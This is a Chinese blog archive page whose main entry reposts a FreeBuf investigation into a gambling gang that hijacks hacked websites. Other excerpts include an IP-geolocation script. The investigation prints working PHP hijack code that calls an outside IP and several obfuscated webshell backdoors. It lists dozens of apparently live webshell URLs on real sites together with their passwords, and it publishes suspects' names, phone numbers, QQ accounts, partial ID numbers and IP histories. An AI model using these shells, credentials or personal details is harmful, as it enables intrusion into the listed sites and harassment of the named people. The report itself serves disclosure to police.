首页
闲言碎语
个人导航
文章归档
友情链接
留言簿
关于
更多
网络电视
云盘
统计
推荐
付费资源
朋友圈集赞
二维码生成
音乐下载
Search
1
全网首发-小米AX6000路由器解锁ssh并固化ssh+2.5G有线mesh组网+公网访问路由后台+红米AX6/小米AX6/AX3600/AX6000/AX9000全系列适用
6,824 阅读
2
青龙面板必装依赖及青龙各种问题解决
3,934 阅读
3
NAS一键批量清除重复文件
3,543 阅读
4
群辉DSM7.0.1安装bootstrap后解决wget: error while loading shared libraries: libgnuintl.so.8: cannot open shared object file: No such file or directory
1,605 阅读
5
《爱情公寓4》全集高清迅雷下载
903 阅读
闲言碎语
学习
福利
技术百科
WordPress
Typecho
软件资源
iPhone
Android
PC软件
CODE
C
VB
PHP
NAS
青龙
登录
Search
标签搜索
wordpress
News
iphone
vb
iOS
technology
渗透
QQ
php
talk
JavaScript
hack
Typecho
NAS
福利
c++
diy
c
免杀
评测
Jonty
累计撰写
275
篇文章
累计收到
980
条评论
今日撰写
0
篇文章
首页
栏目
闲言碎语
学习
福利
技术百科
WordPress
Typecho
软件资源
iPhone
Android
PC软件
CODE
C
VB
PHP
NAS
青龙
页面
闲言碎语
个人导航
文章归档
友情链接
留言簿
关于
网络电视
云盘
统计
推荐
付费资源
朋友圈集赞
二维码生成
音乐下载
用户登录
登录
搜索到
275
篇与
的结果
2016-12-16
大学英语4级答题技巧-热点话题作文范文
2016年12月16日
141 阅读
0 评论
0 点赞
2016-12-16
大学英语4级答题技巧-常用句型分类总结
2016年12月16日
78 阅读
0 评论
0 点赞
2016-11-07
计算机国家二级成绩出来了~
我考的是C语言,万万没想到考了96分~~~查询地址:http://chaxun.neea.edu.cn/examcenter/query.cn?op=doQueryCond&sid=300&pram=results
2016年11月07日
85 阅读
3 评论
0 点赞
2016-11-06
学校计算机创新俱乐部
学校有个计算机创新俱乐部,相当不错的一个俱乐部。由于之前我们单位不让大一报俱乐部,就一开始错过了。。多好的比赛机会~打个酱油也好啊!这学期如愿以偿的进去了。方向就是程序设计,现在跟着我们之前的教员,在学C#。。后来看到AE不错。说实话也想去学。。。虚拟仿真也好啊。。。。。全都想学怎么办。。。那就是先学精一个再说。。。我们俱乐部招新海报。。出自会长(去年是我学长啊,人老帅了),今年暑假拿了中国大学生计算机设计大赛一等奖。。详情:点我 百度搜索出的。。第一张图最帅的那个哥们~国赛一等奖作品《皮囊》
2016年11月06日
84 阅读
4 评论
0 点赞
2016-11-04
入手apple watch nike
之前买了块破表。。ticwatch。。说实话相当垃圾。。有次跑完步竟然开不开机。。就返厂去修了。。后来还是忍不住apple watch2的诱惑就入手了。。只可惜电量不给力。这也是智能手表的鸡肋处。 介绍:Series 2 功能 深空灰色铝金属表壳 S2 双核处理器 内置 GPS 50 米防水2 Ion-X 玻璃镜面 具备 Force Touch 功能的 OLED Retina 显示屏 (2 倍亮度,1000 尼特) 陶瓷表背 Digital Crown 心率传感器、加速感应器和陀螺仪 环境光传感器 驱水扬声器和麦克风 无线网络 (802.11b/g/n 2.4GHz) 蓝牙 4.0 最长可达 18 小时的电池使用时间3 watchOS 3
2016年11月04日
81 阅读
0 评论
0 点赞
2016-11-02
中国最大的Webshell后门箱子调查,所有公开大马全军覆没
起因对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码set_time_limit(20);error_reporting(0); define('u_b','/'); define('s_u','http:// 107.182.228.74/'); define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|youdao@i'); define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p()); function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;} if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d看上去是针对360的,通过360去搜索site网站赌博相关的关键字出现的结果我惊呆了!!!!居然非常多的站被劫持,而且其中包括我渗透测试的不少站,看上去像是搜索引擎自己控制的排名一样,其实是非法分子利用了搜索引擎的排名算法规则。通过收录时间发现在2014年开始出现的,也就是说这个问题已经存在了多年之久,至今才暴露出来。接下来我就开展了所有疑问的调查,因为这些东西被利用对社会影响实在太大,不仅仅我是唯一的受害者,而是这个安全圈子的所有人。调查找到幕后团伙 查大马问题 分析团伙的后门特征1.我对我手里的shell进行了一遍梳理,首先是对后门进行新的地址修改,在原来的后门地址放上了js代码,该段代码记录的是相关指纹信息,以及各大网站的json获取。此时就是静静的等待。2.我对大马又进行了一遍分析,把所有代码读烂了也没任何问题,同时也对马进行了抓包分析,没有任何外部请求。因为一直没发现问题,所以我特意进行了长达一周的数据包监控,还是没有任何结果。这时候就非常纳闷,既然马没有问题,为什么人家可以获取到我的所有后门?难道是我的电脑被入侵?我的网络环境除了http之外,不能做任何协议请求,而我的后门都保存在这台linux里,这点也可以排除。只好再想想是不是哪里疏忽了。3.被该团队劫持过的站,我都检查了一遍,之后我发现,每个站的所有文件创建时间都会被他们更新到入侵时间,这刚好符合了特征,也就是刚被他们入侵过的站。如图特征,几乎每个站被入侵后所有创建时间都会更新一次。之后对他们自己的后门进行了采集样本,新的进展出现了,一共发现2波不同的团伙,但使用的大马均为一类。(见附件1)我对他们的马进行了解密审计后发现,他们自己记录大马后门的箱子地址为api.fwqadmin.com,因为有了新的线索,所以只能暂时保存,后面再对这个进行渗透。进展经过两天的等待,终于得到了该团伙的指纹信息以及QQ号,然后我就开启大神模式进行社工,之后基本确认此人真实信息(圈内叫老袁)。然后我申请了一个QQ小号,以匿名的方式加了一些博彩导航网站上的qq,在QQ上问了好几个人,都没有结果,后来我干脆以做博彩的名义和他们进行深度沟通,通过沟通发现该团伙的shell都是收购来的,一个月收入几百万人民币,是否真实就不得而知了。目前基本可以确认我的判断错误,老袁就是唯一的线索。我对被该团伙做劫持的所有站进行了采集,还有跳转到他们导航的域名。首先对那些不是我的站进行了渗透入侵,采集到后门样本,看到里面有个和我类似的大马,但是核心变量结构不一样,我下载回来进行审计抓包同样没问题,后来通过对比特征,发现大马请求的POST参数都是一样的,例如gopwd=密码&godir= ,马都没异常,这时候初步判断是上层网络出现了问题,通过流量提取到大马特征的地址,如果真是这样就太可怕了。我联系到老袁了,和他进行了一些盘问式的沟通,感觉到他很害怕,他说别搞他,他以前做诈骗的。后来发了一些shell地址给我来讨好我,如下列表,下面是星际团队的:http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.212200.com/mocuz/downapp/images/pclife.php?1=2&Z=Opm Hys7sa5wrKKO00GSBtashras28asNNmsn18 http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop http://www.chinaunix.net/mysql/tmp/hoem.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS http://www.baby-edu.com/member/admin/include/fields/box/index.php?v=qw ytsadAskLs27ssJsjdasd2sS http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop http://www.hubeifc.com/phpcms/modules/content/classes/commentl_api.class.php UTF8 http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS http://www.huse.edu.cn/phpsso_server/phpcms/languages/en-us/condif.inc.php?v=sd ytsadAskLs27ssJsjdasd2sS http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://bbs.fish3000.com/mobcent/app/config/discuz.bak.php?1=2&TD=SAS UUys78tasdRhasd00iasdyTGGgahs http://bbs.dqdaily.com/uc_server/install/images/close.php?1=2&sha=shan 7yJJN730%1&uqYYqwhkkasII17vcxQ1mzaPQhn8!P http://www.aquasmart.cn/member/fckeditor/editor/css/friend.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.yangji.com/member/editor/fckeditor/editor/dtd/fck_dtd_test.gif?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg http://bbs.taisha.org/pms/data/templates/wind_homes.tpl.php?baidu=Google erk12hj3nfher71h3j4k132bnnebr3hg4134 http://www.168w.cc/api/map/baidu/baidu.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.dibaichina.com/goldcard/data/alliance/images/GHMC.php?1=1&baidu=.com Tmbdcuu123uualltop http://www.ijcz.cn/module/brandjoin/join.claos.php?1=2&BK=ManUtd YIasdwj78954qwtyVVJsarwhahuyrwvsllps2 http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qkos http://www.hotpoll.com.cn/i/index.php?v=111 heiheideheihei星际团队是什么鬼?难不成又是做博彩的?通过与老袁进一步沟通后发现,这些shell都是另一个做博彩的,他说是博彩圈子最大的团伙,说实话,我挺兴奋的,发觉这件事越来越有趣了,我倒想看看这是些什么人。不过现在我的目标还在“老袁”身上,因为我得找到卖他shell的人,经过一番较量之后,我得到到了真相,我也叫他提供了交易证据。此处略去不表,我会放到后面取证部分。虽说有了shell卖家的联系方式,可是迟迟没添加上。这时候我又采取了另一种思路,钓鱼取证,老套路,还是在大马地址上js json,上面贴了几段字《add me email:xxx@xxx.com I will give you all webshell》让老袁发给让他,以便他主动联系我。后来他果真访问了几个webshell的地址,我也抓取到了他的真实PC指纹以及代理的指纹以及QQ昵称。之后他主动找到我,问我是不是星际团队的,并说收到我发的邮件了。这时候我就很好奇了,莫非星际团队也找到他了?然后他就来恐吓我,说要抓你们(星际团队),已经调查了星际团队一年了。这时候我心一想,水真深,查来查去的到底是谁在查谁呢。不过他肯定是瞒不过我的,毕竟我有他卖shell的证据,不过意想不到的是他说:“我背后都是省厅的人,你以为这些shell都是怎么来的?都是在国家机器提取的。”我勒个去,国家会干这种事吗?国家提取网站记录我是信,isp保留日志也是1年,至于批量提取全国网站访问特征拿出来卖这我就不信了,要么就是黑客入侵到了运营商去提取出来的。经过了一些沟通后,他居然一直说我是星际团队,就把我拉黑了。后来我就主动加他说:“你是河北的吧,我已经有你犯罪证据了。”他就怕了,主动加我认怂,还发了打包好的webshell给我。这时候我又惊呆了,这简直是逆天的节奏,居然有上万个webshell和国内所有cms的后台登录密码,其中包括dedecms discuz wordpress emlog ecshop empire jieqi phpmyadmin uchome ucenter php168等几乎是全国所有cms都存在,而且每种的数量去重复都在上万条,我会上传一部分在附件。他说他背后的人的有几十万的discuz后台登录账户密码,我测试了他发我的一些后台,均可以登录,其中信息包括登录的fromhash uid 用户名、密码 、安全问题 、安全答案,而且都是前一天的。到底是什么东西能记录如此多东西而且还没有一点异常。我看到其中也有我使用过大马的很多站,里面还有上万条webshell,其中有大量我的站,还有大量各种类型的大马和不同密码,看样子并非我一个人受害,我进行特征匹配出来,大概有上百人的大马不同特征。而且他发我的只是很小一部分,叫我给他钱才给我更多。这样一想他手里的资源都有几十万条了吧。他说他后面的人是技术团队,还有各种0day,是给国家干的,手里有全国的webshell,如果真是他说的这样,那资源为什么出现在他这里了还拿出来卖?很明显是撒谎怕我查他。我不相信,决定继续调查。经过几天的分析,这波数据和以前wooyun曝光的出来的九宫格(大家可以回溯一下2013年的http://www.dedebox.com/core/centerxxxxx.php)是一样的,我对当时的数据也进行了打包分析,发现这波shell里面还存在部分的重复数据。而当前这个大马和当时九宫格的登录参数特征基本都是在Spider PHP Shell(SPS-)这款代码的基础上修改的,也就是说除了后门本身,这伙人还通过其他渠道来提取的大量webshell,之后通过webshell去运行了记录后台数据的代码写入内存中僵死代码,保持着只要不换服务器就常年不死的状态,这也还是猜想,因为后台数据里面有些站的确是九宫格重复的,如果是九宫格后门的话我就有新方向可查了,以上是我进行的大致分析和调查过程。下面我就不描述过程,就直接提供数据记录以及取证结果,交给警方去完成了。取证以下这几个是团伙一(老袁)跳转到的域名:116305.net 559160.net 618309.net 786077.net 551809.com www.919808.net www.226830.com均出自同一团伙的,只是域名不同,每个站跳转到不同的域名分散风险罢了,其中劫持代码里面的ip都是一样107.182.228.74,看得出来很老练。这几个是模拟蜘蛛抓取劫持内容的bc logo图片地址的ip:210.126.27.70 pic.root1111.com 58.96.179.132 104.202.66.226此团伙工作环境ip,都在马来西亚(时间在10月9-号到10月26号以内的)2016-10-26 13:00:01 ( IP 14.192.210.34 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864 2016-10-26 13:20:09 ( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864 2016-10-26 13:00:25 ( IP 175.141.34.101 ) 马来西亚Windows NT 6.3, Chrome 50.0.2661,QQBrowser 9.5.9244, 1920×1080 2016-10-24 13:59:17 ( IP 175.136.41.251 ) 马来西亚Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864 2016-10-25 14:28:11 ( IP 175.143.101.241 ) 马来西亚 Windows NT 10.0, Chrome 47.0.2526, 1920×1080 2016-10-26 13:20:09 ( IP 103.6.245.143 ) 马来西亚Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864 14.192.211.116 马来西亚 14.192.211.223 马来西亚 175.138.234.137马来西亚工作PC指纹(分析此团伙有5个人):Windows NT 6.3, MSIE 11.0,QQBrowser 9.5.9244, 1920×1080, 224 色 Windows 7 & 2008 r2, MSIE 49.0,Firefox 49.0, 1536×864 Windows NT 10.0, Chrome 47.0.2526, 1920×1080 Windows XP, MSIE 6.0, 1126×800 Windows Server 2003, Chrome 49.0.2623, 1920×1080 Windows NT 10.0, MSIE 49.0,Firefox 49.0, 1536×864此团伙首领信息QQ 474304849 641075512 真实姓名:袁立 重庆人 手机号:15998984721 手机MAC:18:9E:FC:11:2C:70 马来西亚手机号:060136958999他的网站:www.badongedu.com www.7cq.tv(他建立的地方论坛) api.fwqadmin.com(这个是他自己正在使用的大马自己留的后门收信地址)附件会有大马样本有兴趣的可以看看 Email:root@7cq.tv pianziso@163.com在国内的历史IP:222.178.225.146(重庆市 电信) 222.178.201.12(重庆市 电信) 27.11.4.19(重庆市 联通) 27.10.36.56(重庆市 联通) 113.204.194.202(重庆市 联通) 119.84.66.14(重庆市 电信) 61.161.125.77(重庆市巴南区 时代e行线网迷俱乐部李家沱店A/B馆)国内的历史PC信息:mac:90-2b-34-93-ad-73 操作系统:Microsoft Windows XP 显卡:NVIDIA GeForce GT 610 CPU:AMD Athlon(tm) II X4 640 Processor 3325HZ 团伙成员信息就没去调查了,找到他就可以了。 WebShell卖家(一切安好)信息VPN代理 :110.10.176.127 韩国 2016-10-24 22:26:37 ( IP 211.110.17.189 ) 韩国 (自己比特币购买的主机搭建)访问时间10月9号真实IP:2016-10-26 16:23:27 ( IP 121.18.238.18 ) 河北省保定市 上海网宿科技股份有限公司联通CDN节点 Windows NT 10.0, Chrome 47.0.2526, 1920×1080 27.186.126.196 河北省保定市 电信 真实ip可能性更大浏览器指纹信息 ,一共3个不同的,但应该都是同一个人,可能电脑比较多,因为他有2个QQWindows NT 6.3, Chrome 45.0.2454, 1366×768 真实指纹 Windows NT 10.0, Chrome 47.0.2526, 1920×1080 Windows NT 6.3, Chrome 45.0.2454, 1366×768, 224 色, 未装 Alexa 工具 Windows NT 10.0, Chrome 53.0.2785, 1600×900, 224 色, QQ2436449670 3496357182 Telegram:@haorenge888此人现在开的奥迪A8,真是土豪啊,看来赚了不少钱还能逍遥法外,是河北口音即河北人。如要查到webshell来源只有查他的幕后渠道。他与老袁的交易信息:。星际团伙信息使用过的域名:wokeda.cn www.98589.com www.356388.com chuan2828.com cnzzz.pw web-159.com diyi1111.com diyi2222.com diyi3333.com diyi4444.com xinyu55.com hongyihai.com 80268.com 5130898.com maimai789.com zhenyi58.com xwgy999.com统计代码document.writeln("<div style=\"display:none;\"><script language=\"javascript\" type=\"text\/javascript\" src=\"http:\/\/js.users.51.la\/18737987.js\"><\/script><\/div>"); var hmt = hmt || []; (function() { var hm = document.createElement("script"); hm.src = "//hm.baidu.com/hm.js?c1c374db31da00a022c09301920eff78"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s) })(); callJump() } } } if (init_flag == "93989") { call_init_error() }可以通过他们网站的统计代码分析登录的记录马来西亚的ip就是真实ip搜索各大搜索引擎爬取跳转到他们的站,和快照特征,竟然有超过1000个被他们劫持过的网站,其中包括了不少全国最大的新闻网站如ifeng.com china.com.cn,如果警方需要我可以提供列表星际劫持团伙在马来西亚,成员大概6个人左右,团伙渗透的手段包括但不限于鱼叉,社工,爆破,xday,漏洞均会爬虫批量去入侵,每次入侵后喜欢留大量的后门,防止权限掉了。成员分工:二名核心技术渗透人员(其中一名主要负责攻击,入侵大型新闻类型站点。一名主要负责代码审计,以及内部一系列php的开发,包括劫持程序,外兼入侵一些中型权重站点) 一名普通技术渗透(对扫描出漏洞的垃圾站点进行入侵) 二名负责挂劫持代码,如果站掉了就会去恢复 一名负责bc网站上的市场兼财务,收账出帐以及收站核心成员在2015年12月份从马来西亚回中国至2016年2月左右返回马来西亚以上是我通过圈内人员采取一些手段了解到的信息,因为这个团伙安全意识比较高,没得到太多真实信息,但是有一位给他们做过外包的黑客可以顺藤摸瓜星际使用过的QQ :3151094164 最早的时候 著名的美女黑客:YingCracker QQ:253778XXX 984754XXX 113244XXX 手机: 1366XXXX or 13665XXXXX 姓名: 江XX 所在省份: 福建 所在城市: 福州 所在地区: 台江找到这位美女黑客去了解下此团伙的情况应该会有进展他们的后门样本:<?php @$A='Acc';$p='_';$o='PO';$s='S';$t='T';$a='as';$b='sert';$Acc=$a.$b;@${$A}(${$p.$o.$s.$t}[ziiuioxs]); echo 'error';exit;?> <?php @$ksvSGu= "\x73tr\x5f\x72e\x70l\x61\x63e"; @$xRec= @$ksvSGu('wcaSq','','awcaSqrrwcaSqawcaSqywcaSq_filwcaSqter'); @$SOet= @$ksvSGu('wZTB','','aswZTBsewZTBrwZTBt'); @$xRec((array)@$_REQUEST['rretgscr'],@$SOet); ?> <?php if($_GET['jumpvv']){ $tu="TVFsnZG9vcnB5J"; $mzd="10pOwoK"; $fc="Cg"; $tnz = str_replace("rn","","rnstrnrrn_rrnernprnlrnarncrne"); $nu="pqldmqFsKCRfUE9"; $qwb = $tnz("u", "", "ubuausue6u4u_udueucoudue"); $lcq = $tnz("j","","jcrjejatej_jfujnjcjtjiojn"); $htx = $lcq('', $qwb($tnz("q", "", $fc.$nu.$tu.$mzd))); $htx();} ?> <?php @$EuTsNl="p"."r"."eg_r"."epla"."c"."e"; @$EuTsNl("/[email]/e",$_POST['iiaqffg'],"error"); ?> <?php $ad = '|';$ad .='.';$ad .='*|';$ad .='e'; @preg_filter('|.*|e', $_REQUEST['andyzhengs'], ''); ?>部分我直接复制到文件夹里面了收信地址嫌疑人信息这次事件的特征和九宫格类似,因此我对2013年的事件进行了梳理并且对这个人进行了深入调查,可以确认两个人,一定是其中一个人干的。如果不是大马的问题那么也可以从这两个人中来了解到本次后门事件的内情,唯一的不确定性就是箱子的大马看不出任何问题。因为和他们之前后门数据实在太像了,几乎概括了所有的cms,记录的后台有些也是几年前被入侵过的九宫格箱子里面的,至今还在记录着新的内容嫌疑人一:原来的吐司成员spider,也就是spider大马的创始人,当时他也留过后门,追溯起来都是2011年的事情,经过调查,那时候他所公开出去的shell大马就存在后门,而且也被他本人大量利用做游戏劫持收录挂马,传闻在2012年就赚到了几百万身价,后来就一直低调出了大众的视线,在圈子销声匿迹了。不过现在调查有新的发现,他一直在活跃着,在今年其中登录过历史邮箱,续费过后门的收信域名,因为他没办法换域名,换了就收不了shell。 Id: iamspider iamsunchao 真实姓名:孙x 年龄:29岁(不确定) 就读过:自贡荣县富西初级中学 户籍:成都 西昌人 QQ:80937430(真实QQ) 862262949(小号) 历史IP(可能已经过时了) 222.215.38.109(四川省内江市 电信) 61.157.123.56(四川省凉山州西昌市 电信) 222.215.39.131(四川省内江市 (隆昌县)电信) 222.209.198.201(四川省成都市新都区 四川音乐学院附近蓝天云网吧)嫌疑人二:圈内的大神:toby57,曾经和他还打过交道,说是在给国家做事了,有点不太像是这件事的主谋,但是这个dedebox.com域名所有人就是他,而且他的能力足够干这样的事情 邮箱:toby57@163.com 也是他最常用的im 历史ip 171.212.206.46(四川省成都市 电信) 220.166.52.45(四川省绵阳市 电信) 222.209.139.66(四川省成都市 电信) 220.166.52.45(四川省绵阳市 电信) 125.66.99.211(四川省南充市 电信) 61.157.97.82(四川省绵阳市 西南科技大学) 112.192.70.251(四川省南充市 联通) 125.65.97.134(四川省绵阳市 电信) 61.157.97.85 (四川省绵阳市 西南科技大学) 182.139.60.17(四川省成都市 电信) 手机号:15208341433 姓名:杨xx 身份证号:5116211989050625xx(四川省岳池县) 所在城市:乐山 就读过:四川省绵阳市西南科技大学结论目前其实也没什么结论,从何泄漏的全国的所有大马以及各类cms后台后门还是个谜,因为能力太菜了。。。但是我相信这个谜警方可以解开,你们赋有足够的权利和使命去完成打击。否则对网民的危害太大了,那些webshell被拿去做博彩做诈骗危害就很大了,几乎一个菠菜行业一个诈骗行业的黑帽seo源头都来于此,如果不及时阻止危害还会无限扩大。另外要去看被入侵的站点请到360搜索,娱乐场看最新一天收录https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d温馨提示:使用过任何大马的帽子注意检查下自己的shell,看看里面的文件时间是否统一为最近的创建时间ps:附件为webshell部分列表,大约几千条随机copy。传送门:https://1drv.ms/u/s!AhMf1bUbIk7UanjRbtWlwOyebhU部分受害域名列表(这个基数是去重复1W多条,未去重复大概20万条,其中的信息量与附件类似,一个站会记录所有的管理员登录账户密码,包括webshell的存在)传送门:https://1drv.ms/t/s!AhMf1bUbIk7Ua72FwZXZuVMX3fw大家在拿到受害列表可以搜索下手里的webshell域名,如果存在那么就注意及时处理掉,以免被不法分子给你造成危害。*原创作者:为了作者安全,已经匿名处理,转载请注明来自FreeBuf(FreeBuf.COM)
2016年11月02日
103 阅读
4 评论
0 点赞
2016-10-29
实用技巧|如何通过IP地址进行精准定位
在甲方工作的朋友可能会遇到这样的问题,服务器或者系统经常被扫描,通过IP地址我们只能查到某一个市级城市,如下图:当我们想具体到街道甚至门牌号,该怎么办???偶然间发现百度地图有高精度IP定位API的接口,通过该接口我们可以通过IP地址定位到具体的地理位置,甚至能精确到门牌号及周围的标志性建筑。该接口的说明地址为:http://lbsyun.baidu.com/index.php?title=webapi/high-acc-ip若想要使用该接口进行查询,必须先申请一个密钥(AK),如下图:申请过程就不进行说明了。API的接口参数说明和返回参数说明也不过多的介绍,大家可以看一看。因为我想返回基础定位结果+地址信息+POI信息,所以我将请求参数extensions的值设置为3。一次完整的http请求为:http://api.map.baidu.com/highacciploc/v1?qcip=183.55.116.90&qterm=pc&ak=“你的 密钥(AK)”&coord=bd09ll&extensions=3 。请求结果如下图:结果为json格式数据:{"content":{"location":{"lat":23.06588,"lng":115.404586},"locid":"925a2a9e3ac5be1cf003afd23c344ab3","radius":30,"confidence":0.5,"address_component":{"country":"中国","province":"广东省","city":"汕尾市","district":"海丰县","street":"新平路","street_number":"","admin_area_code":441521},"formatted_address":"广东省汕尾市海丰县新平路","business":"公平"},"result":{"error":161,"loc_time":"2016-10-19 21:53:28"}}我们需要的字段为:content字段里面的formatted_address。当然我们也可以将location里面的经度和纬度提取出来从而显示在地图上面。有的IP地址会返回pois数据,比如:183.55.116.95。返回参数如下:{"content":{"location":{"lat":23.082367,"lng":115.466276},"locid":"3fb96555906fff3100ff21119142ccd5","radius":30,"confidence":1.0,"address_component":{"country":"中国","province":"广东省","city":"汕尾市","district":"海丰县","street":"S335","street_number":"","admin_area_code":441521},"formatted_address":"广东省汕尾市海丰县S335","pois":[{"name":"双墩村","address":"汕尾市海丰县三三五省道","tag":"行政地标;村庄","location":{"lat":23.082422,"lng":115.465348},"uid":"18010998377147269119"},{"name":"双墩村委会","address":"汕尾市海丰县","tag":"政府机构;各级政府","location":{"lat":23.083394,"lng":115.465914},"uid":"17661602237861855231"},{"name":"长联塘尾","address":"汕尾市海丰县","tag":"行政地标;村庄","location":{"lat":23.081358,"lng":115.467315},"uid":"18010998372852301823"},{"name":"双墩小学","address":"335省道附近","tag":"教育培训;小学","location":{"lat":23.083336,"lng":115.465061},"uid":"17661601958688980991"},{"name":"大溪头","address":"汕尾市海丰县","tag":"行政地标;村庄","location":{"lat":23.090326,"lng":115.465995},"uid":"18010998368557334527"}],"location_description":"双墩村东104米"},"result":{"error":161,"loc_time":"2016-10-19 22:03:31"}}此时我们可以把pois字段也提取出来,值得注意的是pois为数组,我们可以遍历数组数据。通过上面的分析,用python简单的写了一个脚本,具体代码如下:# -*- coding:utf-8 -*- # author:allen权 import sys import urllib2 import json def get_ip_information(ip): url='http://api.map.baidu.com/highacciploc/v1?qcip='+ip+'&qterm=pc&ak='你的密钥(AK)'&coord=bd09ll&extensions=3' poiss='' request = urllib2.Request(url) page = urllib2.urlopen(request, timeout=10) data_json = page.read() data_dic = json.loads(data_json) if(data_dic.has_key("content")): content=data_dic["content"] address_component=content["address_component"] formatted_address=content["formatted_address"] print "该IP地址的具体位置为:" print address_component["country"] print formatted_address if (content.has_key("pois")): print "该IP地址附近POI信息如下:" pois = content["pois"] for index in range(len(pois)): pois_name = pois[index]["name"] pois_address = pois[index]["address"] print pois_name, pois_address else: print 'IP地址定位失败!!!' if __name__ == '__main__': get_ip_information('183.55.116.95')大家把脚本上面的参数ak值改为自己的密钥即可。测试截图如下:再放一张自己IP的测试截图:确实精确到了路名,很准确,虽然没有pois的信息。最后声明一下,成功率:综合定位成功率 65% ,精度:90% 误差 80m 以内;95% 误差 350m。这是官方给出的数据,所说有一定的概率是查询失败的!!!!
2016年10月29日
102 阅读
0 评论
0 点赞
2016-10-23
网站启用新主题
网站启用新主题cupcake,作者为大雄,看腻了以前的博客主题,也该换换口味了。。希望大家多多支持这个主题。说不定去买还有优惠哦~另外。一些文章有版权,要在原主题才看得出。。这个主题就看不出了==。so。。。见谅!
2016年10月23日
100 阅读
0 评论
0 点赞
2016-10-16
喝可乐杀精?小蝌蚪真的能被可乐杀死么?
